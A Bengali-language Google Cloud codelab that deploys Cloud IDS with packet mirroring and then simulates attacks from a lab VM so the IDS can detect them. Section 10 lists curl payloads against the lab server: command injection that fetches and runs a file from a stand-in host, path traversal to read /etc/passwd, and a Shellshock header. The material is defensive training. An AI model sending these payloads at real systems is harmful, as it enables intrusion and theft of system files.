ক্লাউড আইডিএস

১. ভূমিকা

এই ল্যাবে, আপনি ক্লাউড আইডিএস (Cloud IDS) স্থাপন করবেন, যা একটি পরবর্তী প্রজন্মের উন্নত অনুপ্রবেশ সনাক্তকরণ পরিষেবা এবং এটি অনুপ্রবেশ, ম্যালওয়্যার, স্পাইওয়্যার ও কমান্ড-অ্যান্ড-কন্ট্রোল আক্রমণের মতো হুমকি সনাক্ত করে। আপনি একাধিক আক্রমণের সিমুলেশন করবেন এবং ক্লাউড কনসোলে (Cloud Console) হুমকির বিস্তারিত তথ্য দেখবেন।

আপনি যা শিখবেন

  • কীভাবে একটি ক্লাউড আইডিএস এন্ডপয়েন্ট তৈরি করবেন
  • gcloud কমান্ড ব্যবহার করে কীভাবে ২টি ভার্চুয়াল মেশিন তৈরি করবেন
  • প্যাকেট মিররিং পলিসি কীভাবে তৈরি করবেন
  • ভার্চুয়াল মেশিন থেকে কীভাবে অ্যাটাক ট্র্যাফিক সিমুলেট করা যায়
  • ক্লাউড কনসোল এবং ক্লাউড লগিং-এ হুমকির বিবরণ কীভাবে দেখবেন

আপনার যা যা লাগবে

  • লিনাক্সের মৌলিক কমান্ড সম্পর্কে জ্ঞান

২. ক্লাউড আইডিএস ব্যবহারের ক্ষেত্রসমূহ

ক্লাউড আইডিএস গ্রাহকদের জন্য একটি গুগল ক্লাউড নেটিভ নেক্সট-জেন ইন্ট্রুশন ডিটেকশন সার্ভিস (আইডিএস) প্রদান করে, যা তাদের উন্নত থ্রেট ডিটেকশন এবং পিসিআই ১১.৪-এর মতো কমপ্লায়েন্সের প্রয়োজনীয়তা পূরণে সহায়তা করে। এই পরিষেবাটি পালো অল্টো নেটওয়ার্কস-এর থ্রেট প্রোটেকশন প্রযুক্তি দ্বারা চালিত হয়ে উন্নত ইন্ট্রুশন ডিটেকশন প্রদান করে। গুগল ক্লাউডের বিশ্বমানের পরিকাঠামো এবং পালো অল্টো নেটওয়ার্কস-এর বিশ্বমানের নিরাপত্তার সমন্বয়ে, গ্রাহকরা একটি সম্পূর্ণ পরিচালিত, উচ্চ কর্মক্ষমতা সম্পন্ন এবং সর্বোচ্চ নিরাপত্তা কার্যকারিতাসম্পন্ন উন্নত থ্রেট ডিটেকশন পরিষেবার এক অতুলনীয় সংমিশ্রণ লাভ করেন।

গ্রাহকরা যখন ক্লাউডে স্থানান্তরিত হন, তখন নিরাপত্তা তাদের কাছে সবচেয়ে গুরুত্বপূর্ণ বিষয় হয়ে ওঠে। তারা অন-প্রেমে থাকা ইন্ট্রুশন ডিটেকশন সার্ভিস (IDS)-এর মতো একই ধরনের নিরাপত্তা ব্যবস্থা ক্লাউডেও পেতে চান। একটি থার্ড-পার্টি নিরাপত্তা সমাধান স্থাপন করে তার পরিকাঠামো পরিচালনা করা বা নিজস্ব সিগনেচার আনার তুলনায়, তারা সহজে স্থাপনযোগ্যতা, উচ্চ কর্মক্ষমতা এবং অপ্টিমাইজড খরচের জন্য একটি ক্লাউড নেটিভ ম্যানেজড IDS সমাধান ব্যবহার করতে দৃঢ়ভাবে পছন্দ করেন। গুগল ক্লাউড IDS একটি এন্ড-টু-এন্ড এবং অটো-স্কেলিং ম্যানেজড IDS পরিষেবা প্রদান করে, যা গ্রাহকদের হুমকি বিশ্লেষণ ও প্রশমনে তাদের সময় ব্যয় করতে সক্ষম করে এবং পরিকাঠামো বা থ্রেট সিগনেচার পরিচালনার জন্য তাদের সময় ও সম্পদকে মুক্ত করে।

ক্লাউড আইডিএস আউট অফ ব্যান্ডে স্থাপন করা হয় এবং এটি হুমকি শনাক্ত করে সতর্ক করতে পারে, কিন্তু হুমকি প্রতিরোধ করতে পারে না। এটি গুগল ক্লাউড প্যাকেট মিররিং ব্যবহার করে নেটওয়ার্ক ট্র্যাফিকের একটি অনুলিপি তৈরি করে, যা পালো অল্টো নেটওয়ার্কের হুমকি শনাক্তকরণ ইঞ্জিন দ্বারা বিশ্লেষণ করা হয়।

৩. কোডল্যাব টপোলজি

5a276f399e1d31e2.png

চিত্র ১. এই ল্যাবের জন্য ক্লাউড আইডিএস স্থাপনের উচ্চ-স্তরের স্থাপত্যগত সংক্ষিপ্ত বিবরণ।

৪. সেটআপ এবং প্রয়োজনীয়তা

স্ব-গতিতে পরিবেশ সেটআপ

  1. Google Cloud Console- এ সাইন-ইন করুন এবং একটি নতুন প্রজেক্ট তৈরি করুন অথবা বিদ্যমান কোনো প্রজেক্ট পুনরায় ব্যবহার করুন। যদি আপনার আগে থেকে Gmail বা Google Workspace অ্যাকাউন্ট না থাকে, তবে আপনাকে অবশ্যই একটি তৈরি করতে হবে।

96a9c957bc475304.png

b9a10ebdf5b5a448.png

a1e3c01a38fa61c2.png

  • প্রজেক্টের নামটি হলো এই প্রজেক্টের অংশগ্রহণকারীদের প্রদর্শিত নাম। এটি একটি ক্যারেক্টার স্ট্রিং যা গুগল এপিআই ব্যবহার করে না, এবং আপনি যেকোনো সময় এটি আপডেট করতে পারেন।
  • সমস্ত গুগল ক্লাউড প্রজেক্ট জুড়ে প্রজেক্ট আইডি অবশ্যই অনন্য হতে হবে এবং এটি অপরিবর্তনীয় (একবার সেট করার পর পরিবর্তন করা যায় না)। ক্লাউড কনসোল স্বয়ংক্রিয়ভাবে একটি অনন্য স্ট্রিং তৈরি করে; সাধারণত এটি কী তা নিয়ে আপনার মাথা ঘামানোর দরকার নেই। বেশিরভাগ কোডল্যাবে, আপনাকে প্রজেক্ট আইডি উল্লেখ করতে হবে (এবং এটি সাধারণত PROJECT_ID হিসাবে চিহ্নিত করা হয়), তাই যদি এটি আপনার পছন্দ না হয়, তবে এলোমেলোভাবে অন্য একটি তৈরি করুন, অথবা, আপনি নিজের আইডি দিয়ে চেষ্টা করে দেখতে পারেন যে সেটি উপলব্ধ আছে কিনা। এরপর প্রজেক্ট তৈরি হয়ে গেলে এটি "স্থির" হয়ে যায়।
  • তৃতীয় আরেকটি ভ্যালু আছে, যা হলো প্রজেক্ট নম্বর এবং কিছু এপিআই এটি ব্যবহার করে। এই তিনটি ভ্যালু সম্পর্কে আরও জানতে ডকুমেন্টেশন দেখুন।
  1. এরপরে, ক্লাউড রিসোর্স/এপিআই ব্যবহার করার জন্য আপনাকে ক্লাউড কনসোলে বিলিং চালু করতে হবে। এই কোডল্যাবটি সম্পন্ন করতে খুব বেশি খরচ হওয়ার কথা নয়, এমনকি আদৌ কোনো খরচ নাও হতে পারে। এই টিউটোরিয়ালের পর যাতে কোনো বিলিং না হয়, সেজন্য রিসোর্সগুলো বন্ধ করতে কোডল্যাবের শেষে দেওয়া যেকোনো "ক্লিন-আপ" নির্দেশাবলী অনুসরণ করুন। গুগল ক্লাউডের নতুন ব্যবহারকারীরা ৩০০ মার্কিন ডলারের ফ্রি ট্রায়াল প্রোগ্রামের জন্য যোগ্য।

ক্লাউড শেল শুরু করুন

যদিও গুগল ক্লাউড আপনার ল্যাপটপ থেকে দূরবর্তীভাবে পরিচালনা করা যায়, এই কোডল্যাবে আপনি গুগল ক্লাউড শেল ব্যবহার করবেন, যা ক্লাউডে চালিত একটি কমান্ড লাইন পরিবেশ।

GCP কনসোল থেকে উপরের ডানদিকের টুলবারে থাকা ক্লাউড শেল আইকনে ক্লিক করুন:

bce75f34b2c53987.png

পরিবেশটি প্রস্তুত করতে এবং এর সাথে সংযোগ স্থাপন করতে মাত্র কয়েক মুহূর্ত সময় লাগবে। এটি শেষ হলে, আপনি এইরকম কিছু দেখতে পাবেন:

f6ef2b5f13479f3a.png

এই ভার্চুয়াল মেশিনটিতে আপনার প্রয়োজনীয় সমস্ত ডেভেলপমেন্ট টুলস লোড করা আছে। এটি একটি স্থায়ী ৫ জিবি হোম ডিরেক্টরি প্রদান করে এবং গুগল ক্লাউডে চলে, যা নেটওয়ার্ক পারফরম্যান্স ও অথেনটিকেশনকে ব্যাপকভাবে উন্নত করে। এই ল্যাবে আপনার সমস্ত কাজ শুধুমাত্র একটি ব্রাউজার দিয়েই করা যাবে।

৫. শুরু করার আগে

এপিআই সক্ষম করুন

ক্লাউড শেলের ভিতরে, নিশ্চিত করুন যে আপনার প্রজেক্ট আইডি সেট আপ করা আছে।

gcloud config list project
gcloud config set project [YOUR-PROJECT-NAME]
export PROJECT_ID=$(gcloud config get-value project | sed '2d')

সমস্ত প্রয়োজনীয় পরিষেবা সক্রিয় করুন

gcloud services enable compute.googleapis.com
gcloud services enable ids.googleapis.com
gcloud services enable logging.googleapis.com

৬. ভিপিসি নেটওয়ার্ক তৈরি করুন

ভিপিসি নেটওয়ার্ক

ক্লাউড শেল থেকে

gcloud compute networks create cloud-ids \
--subnet-mode=custom

সাবনেট

ক্লাউড শেল থেকে

gcloud compute networks subnets create cloud-ids-useast1 \
--range=192.168.10.0/24 \
--network=cloud-ids \
--region=us-east1

ব্যক্তিগত পরিষেবা অ্যাক্সেস

ক্লাউড শেল থেকে

gcloud compute addresses create cloud-ids-ips \
--global \
--purpose=VPC_PEERING \
--addresses=10.10.10.0 \
--prefix-length=24 \
--description="Cloud IDS Range" \
--network=cloud-ids

ব্যক্তিগত পরিষেবা সংযোগ

ক্লাউড শেল থেকে

gcloud services vpc-peerings connect \
--service=servicenetworking.googleapis.com \
--ranges=cloud-ids-ips \
--network=cloud-ids \
--project=$PROJECT_ID

ফায়ারওয়াল নিয়ম

আপনার VM ইনস্ট্যান্সগুলিতে IAP-কে সংযোগ করার অনুমতি দিতে, এমন একটি ফায়ারওয়াল নিয়ম তৈরি করুন যা:

  • এটি সেই সমস্ত VM ইনস্ট্যান্সের ক্ষেত্রে প্রযোজ্য, যেগুলোকে আপনি IAP ব্যবহার করে অ্যাক্সেসযোগ্য করতে চান।
  • 35.235.240.0/20 আইপি রেঞ্জ থেকে ইনগ্রেস ট্র্যাফিকের অনুমতি দেয়। এই রেঞ্জে সেই সমস্ত আইপি অ্যাড্রেস রয়েছে যা IAP টিসিপি ফরওয়ার্ডিংয়ের জন্য ব্যবহার করে।

ক্লাউড শেল থেকে

gcloud compute firewall-rules create allow-iap-proxy \
--direction=INGRESS \
--priority=1000 \
--network=cloud-ids \
--action=ALLOW \
--rules=tcp:22 \
--source-ranges=35.235.240.0/20

সার্ভারে স্ট্যান্ডার্ড HTTP পোর্ট (TCP 80) এবং ICMP প্রোটোকল অনুমোদনের জন্য:

  • "সার্ভার" নেটওয়ার্ক ট্যাগযুক্ত রিসোর্সগুলির ক্ষেত্রে প্রযোজ্য।
  • সকল উৎস থেকে প্রবেশের অনুমতি দেয়

ক্লাউড শেল থেকে

gcloud compute firewall-rules create allow-http-icmp \
--direction=INGRESS \
--priority=1000 \
--network=cloud-ids \
--action=ALLOW \
--rules=tcp:80,icmp \
--source-ranges=0.0.0.0/0 \
--target-tags=server

ক্লাউড NAT ইনস্ট্যান্স তৈরি করুন

ক্লাউড রাউটার

ক্লাউড শেল থেকে

gcloud compute routers create cr-cloud-ids-useast1 \
--region=us-east1 \
--network=cloud-ids

ক্লাউড ন্যাট

ক্লাউড শেল থেকে

gcloud compute routers nats create nat-cloud-ids-useast1 \
--router=cr-cloud-ids-useast1 \
--router-region=us-east1 \
--auto-allocate-nat-external-ips \
--nat-all-subnet-ip-ranges

৭. ক্লাউড আইডিএস এন্ডপয়েন্ট তৈরি করুন

এই অংশে, আপনি us-east1-এ একটি ক্লাউড IDS এন্ডপয়েন্ট তৈরি করবেন, যার সেভিয়ারিটি ইনফরমেশনাল হিসেবে সেট করা থাকবে। IDS এন্ডপয়েন্টটি তৈরি হতে প্রায় ২০ মিনিট সময় লাগে।

আইডিএস এন্ডপয়েন্ট

ক্লাউড শেল থেকে

gcloud ids endpoints create cloud-ids-east1 \
--network=cloud-ids \
--zone=us-east1-b \
--severity=INFORMATIONAL \
--async

ক্লাউড আইডিএস এন্ডপয়েন্ট চালু হয়েছে কিনা যাচাই করুন

gcloud ids endpoints list --project=$PROJECT_ID

আউটপুট -

ID: cloud-ids-east1
LOCATION: us-east1-b
SEVERITY: INFORMATIONAL
STATE: CREATING
NETWORK: cloud-ids
TRAFFIC_LOGS:

৮. ২টি ভার্চুয়াল মেশিন তৈরি করুন

এই অংশে, আপনি ২টি ভার্চুয়াল মেশিন তৈরি করবেন। প্রথমটি হবে আপনার ওয়েব সার্ভার, যা ক্লাউড আইডিএস-এ মিররিং করবে। দ্বিতীয় ভার্চুয়াল মেশিনটি হবে আপনার অ্যাটাক ট্র্যাফিকের উৎস।

ভার্চুয়াল মেশিন ১ (সার্ভার)

ক্লাউড শেল থেকে

gcloud compute instances create server \
--zone=us-east1-b \
--machine-type=e2-medium \
--subnet=cloud-ids-useast1 \
--no-address \
--private-network-ip=192.168.10.20 \
--metadata=startup-script=\#\!\ /bin/bash$'\n'sudo\ apt-get\ update$'\n'sudo\ apt-get\ -qq\ -y\ install\ nginx \
--tags=server \
--image=debian-10-buster-v20210512 \
--image-project=debian-cloud \
--boot-disk-size=10GB

ভার্চুয়াল মেশিন ২ (ক্লায়েন্ট)

ক্লাউড শেল থেকে

gcloud compute instances create attacker \
--zone=us-east1-b \
--machine-type=e2-medium \
--subnet=cloud-ids-useast1 \
--no-address \
--private-network-ip=192.168.10.10 \
--image=debian-10-buster-v20210512 \
--image-project=debian-cloud \
--boot-disk-size=10GB 

৯. সার্ভার প্রস্তুত করা

এই টাস্কে, আপনাকে আপনার সার্ভার যাচাই করতে হবে এবং ক্লায়েন্টের জন্য একটি নিরীহ ম্যালওয়্যার পেলোড সরবরাহ করতে হবে।

ক্লাউড শেলের মাধ্যমে ভিএম-এ SSH করুন

gcloud compute ssh server --zone=us-east1-b --tunnel-through-iap

ওয়েব পরিষেবাটি চালু আছে কিনা তা নিশ্চিত করুন।

sudo systemctl status nginx

আউটপুট - সক্রিয় এবং চলমান যাচাই করুন

● nginx.service - A high performance web server and a reverse proxy server
   Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
   Active: active (running) since Tue 2021-05-25 18:01:49 UTC; 5h 24min ago
     Docs: man:nginx(8)
 Main PID: 1347 (nginx)
    Tasks: 3 (limit: 4665)
   Memory: 4.5M
   CGroup: /system.slice/nginx.service
           ├─1347 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
           ├─1348 nginx: worker process
           └─1349 nginx: worker process

May 25 18:01:49 server systemd[1]: Starting A high performance web server and a reverse proxy server...
May 25 18:01:49 server systemd[1]: Started A high performance web server and a reverse proxy server.

ওয়েব পরিষেবাতে ডিরেক্টরি পরিবর্তন করুন

cd /var/www/html/

ওয়েব সার্ভারে একটি নিরীহ ম্যালওয়্যার ফাইল তৈরি করুন

sudo touch eicar.file

বিষয়বস্তু পেস্ট করুন

echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | sudo tee eicar.file

ক্লাউডশেলে ফিরে যান

exit

একটি ক্লাউড আইডিএস প্যাকেট মিররিং পলিসি তৈরি করুন

IDS এন্ডপয়েন্ট ফরওয়ার্ডিং রুলটি শনাক্ত করুন এবং নিশ্চিত করুন যে IDS এন্ডপয়েন্টের অবস্থা "READY" রয়েছে।

gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b 

উদাহরণ আউটপুট - 'endpointForwardingRule' থেকে মানটি কপি করুন

user1@cloudshell:~ (ids-project)$ gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b
createTime: '2021-07-01T21:03:56.099839751Z'
endpointForwardingRule: https://www.googleapis.com/compute/v1/projects/n3de7a2d45b28a050p-tp/regions/us-east1/forwardingRules/ids-fr-east-y085fcfwalsok1ca
endpointIp: 172.16.30.43
name: projects/ids-project/locations/us-east1-b/endpoints/cloud-ids-east1
network: projects/ids-project/global/networks/cloud-ids
severity: INFORMATIONAL
state: READY
updateTime: '2021-07-01T21:21:32.744309107Z'

IDS এন্ডপয়েন্ট ফরওয়ার্ডিং রুলটি একটি ভেরিয়েবলে সংরক্ষণ করুন।

export FORWARDING_RULE=$(gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b --format="value(endpointForwardingRule)")
echo $FORWARDING_RULE

প্যাকেট মিররিং নীতি

ক্লাউড শেল থেকে

gcloud compute packet-mirrorings create cloud-ids-packet-mirroring \
--region=us-east1 \
--collector-ilb=$FORWARDING_RULE \
--network=cloud-ids \
--mirrored-subnets=cloud-ids-useast1

প্যাকেট মিররিং পলিসি তৈরি করা হয়েছে কিনা যাচাই করুন

ক্লাউড শেল থেকে

gcloud compute packet-mirrorings list

আউটপুট

user1@cloudshell:~ (ids-project)$ gcloud compute packet-mirrorings list
NAME                        REGION       NETWORK    ENABLE
cloud-ids-packet-mirroring  us-east1     cloud-ids  TRUE

১০. আক্রমণ ট্র্যাফিক অনুকরণ করুন

আক্রমণকারী ভার্চুয়াল মেশিনে (ক্লায়েন্ট) SSH করুন

ক্লাউড শেল থেকে

gcloud compute ssh attacker --zone=us-east1-b --tunnel-through-iap

ক্ষতিকারক ট্র্যাফিক অনুকরণ করতে নিম্নলিখিত কার্ল (curl) অনুরোধগুলি চালান।

curl "http://192.168.10.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
curl http://192.168.10.20/?item=../../../../WINNT/win.ini
curl http://192.168.10.20/eicar.file
curl http://192.168.10.20/cgi-bin/../../../..//bin/cat%20/etc/passwd
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://192.168.10.20/cgi-bin/test-critical

CloudShell-এ ফিরে যেতে VM থেকে প্রস্থান করুন।

exit

১১. ক্লাউড আইডিএস দ্বারা শনাক্ত করা হুমকিগুলো পর্যালোচনা করুন।

ক্লাউড আইডিএস ড্যাশবোর্ডে যান

নেভিগেশন মেনু > নেটওয়ার্ক নিরাপত্তা > ক্লাউড আইডিএস

37583419aa604aa8.png

থ্রেটস ট্যাবে যান।

b7d934f409b4e2b.png

যেমনটি দেখতে পাচ্ছেন, ক্লাউড আইডিএস বিভিন্ন অ্যাটাক ট্র্যাফিক প্রোফাইল ক্যাপচার করেছে এবং প্রতিটি থ্রেটের বিস্তারিত তথ্য প্রদান করেছে। আপনি যদি কোনো থ্রেট দেখতে না পান, তাহলে আপনাকে "রিফ্রেশ" বোতামে ক্লিক করতে হতে পারে। আমরা এখন আরেকটু গভীরে গিয়ে থ্রেটের বিস্তারিত তথ্য দেখব।

"Bash Remote Code Execution Vulnerability" থ্রেটটি খুঁজুন এবং ডানদিকে থাকা তিনটি ডটে ক্লিক করে "View threat details" নির্বাচন করুন।

b122b30dd8d43d9b.png

ee1b201a12db7ef7.png

এখন আমরা ক্লাউড লগিং-এ এই ঘটনার বিস্তারিত দেখব। বাম দিকের তীরচিহ্নে ক্লিক করে থ্রেটস পেজে ফিরে যান।

ডানদিকের তিনটি ডটে ক্লিক করুন এবং "View threat logs" নির্বাচন করুন।

b122b30dd8d43d9b.png

ff0d5a0d652ddd83.png

ক্লাউড লগিং-এর জন্যও একই বিবরণ প্রদান করা হয়। এর মাধ্যমে আপনি লগগুলো ক্লাউড স্টোরেজ, ক্রনিকল, বা যেকোনো SIEM/SOAR-এ পাঠাতে পারেন। এছাড়াও আপনি অ্যালার্টের উপর ভিত্তি করে প্রতিকারমূলক ব্যবস্থা নেওয়ার জন্য কাস্টম ওয়ার্কফ্লো তৈরি করতে পারেন; যেমন—একটি ক্লাউড ফাংশন তৈরি করা যা অ্যালার্ট পেলে ট্রিগার হবে এবং আইপি অ্যাড্রেসটি ব্লক করার জন্য ফায়ারওয়াল রুল তৈরি/আপডেট করা, অথবা একটি ক্লাউড আর্মার পলিসি তৈরি/আপডেট করা।

১২. পরিষ্কার করার পদক্ষেপ

ভিএম ইনস্ট্যান্স থেকে প্রস্থান করুন (সমস্ত ট্যাব)

exit

একটিমাত্র ক্লাউড শেল টার্মিনাল থেকে ল্যাবের উপাদানগুলো মুছে ফেলুন

gcloud compute routers nats delete nat-cloud-ids-useast1 --router=cr-cloud-ids-useast1 --router-region=us-east1 --quiet

gcloud compute routers delete cr-cloud-ids-useast1 --region=us-east1 --quiet

gcloud compute instances delete server --zone=us-east1-b --quiet

gcloud compute instances delete attacker --zone=us-east1-b --quiet

gcloud compute firewall-rules delete allow-iap-proxy --quiet

gcloud compute firewall-rules delete allow-http-icmp --quiet

gcloud compute packet-mirrorings delete cloud-ids-packet-mirroring --region=us-east1 --quiet

gcloud ids endpoints delete cloud-ids-east1 --zone=us-east1-b --quiet

gcloud services vpc-peerings delete --service=servicenetworking.googleapis.com --network=cloud-ids --project=$PROJECT_ID --quiet

gcloud compute addresses delete cloud-ids-ips --global --quiet

gcloud compute networks subnets delete cloud-ids-useast1 --region us-east1 --quiet

gcloud compute networks delete cloud-ids --quiet

১৩. অভিনন্দন!

কোডল্যাবটি সম্পন্ন করার জন্য অভিনন্দন।

আমরা যা আলোচনা করেছি

  • ক্লাউড আইডিএস ব্যবহারের ক্ষেত্রসমূহ
  • নেটওয়ার্কের প্রয়োজনীয়তা
  • সমর্থিত এপিআই
  • একটি ক্লাউড আইডিএস এন্ডপয়েন্ট তৈরি করা হয়েছে
  • ২টি ভিএম স্থাপন করা হয়েছে
  • ক্লায়েন্ট থেকে কিছু "আক্রমণাত্মক" ট্র্যাফিক তৈরি হয়েছে।
  • IDS কর্তৃক যাচাইকৃত হুমকি শনাক্ত করা হয়েছে।
  • হুমকির বিবরণ এবং লগ পর্যালোচনা করুন